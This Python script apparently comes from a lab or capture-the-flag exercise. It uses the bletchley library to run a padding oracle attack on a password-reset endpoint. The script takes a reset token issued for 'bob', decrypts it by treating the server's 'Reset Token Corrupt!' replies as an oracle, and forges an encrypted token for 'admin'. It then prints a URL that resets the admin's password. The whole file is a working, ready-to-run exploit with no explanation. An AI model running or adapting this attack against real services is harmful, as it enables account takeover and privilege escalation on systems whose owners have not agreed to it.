#!/usr/bin/env python3 import sys import time import json from bletchley import blobtools,buffertools from bletchley import chosenct from bletchley.CBC import * host = '' port = 8888 protocol = 'http' def fetchFreshToken(): gen_url = '%s://%s:%d/generate-reset-token?user=bob' % (protocol,host,port) response = requests.get(gen_url) return response.content.split(b'token=',1)[1].split(b'"')[0] def decode(token): return blobtools.decodeChain(['percent/upper','base64/rfc3548'], token) def encode(binary): return blobtools.encodeChain(['base64/rfc3548','percent/upper'], binary) try: import requests import urllib3 urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) except: sys.stderr.write('ERROR: Could not import requests module. Ensure it is installed.\n') sys.stderr.write(' Under Debian, the package name is "python3-requests"\n.') sys.stderr.write(' Alternatively, re-generate this script using the --native option.\n.') sys.exit(1) session = requests.Session() def sendRequest(session, data=None): data = data.decode('utf-8') method = 'GET' path = '/reset-password?token='+data url = "%s://%s:%d%s" % (protocol,host,port,path) body = (b'') # Set verify=True if you want to validate the server cert return session.request(method, url, headers={}, data=body, allow_redirects=False, verify=False) def processResponse(data, iv=None): global session global poa global ciphertext global decrypting if decrypting: length = len(ciphertext)-len(iv)-len(poa.decrypted) #'\x1b[1;31m' '\x1b[39;49m' if len(poa.decrypted) > 0: d = repr(('?'*length)+poa.decrypted.decode('utf-8')) d = d[0:length+1] + '\x1b[1;31m' +d[length+1:length+2] + '\x1b[0m' + d[length+2:] print('\x1b[F '+d, file=sys.stderr) response = sendRequest(session, encode(iv+data)) if b'Reset Token Corrupt!' in response.content: return False return True decrypting = True token = fetchFreshToken() print('Fetched new password reset token for bob: ' + token.decode('utf-8')+'\n',file=sys.stderr) ciphertext = decode(token) #print(processResponse(ciphertext), file=sys.stderr) # Padding Oracle Attacks poa = POA(processResponse, 16, ciphertext[16:], iv=ciphertext[0:16], threads=1) #print(poa.probe_padding()) # sanity check print('\x1b[F \''+poa.decrypt().decode('utf-8')) decrypting = False print('Now encrypting forged token...', file=sys.stderr) iv,ciphertext = poa.encrypt(json.dumps({'user':'admin','expires':int(time.time()+1000*24*60*60)}).encode('utf-8')) print("Use this URL to reset the admin's password:") print(''+encode(iv+ciphertext).decode('utf-8'))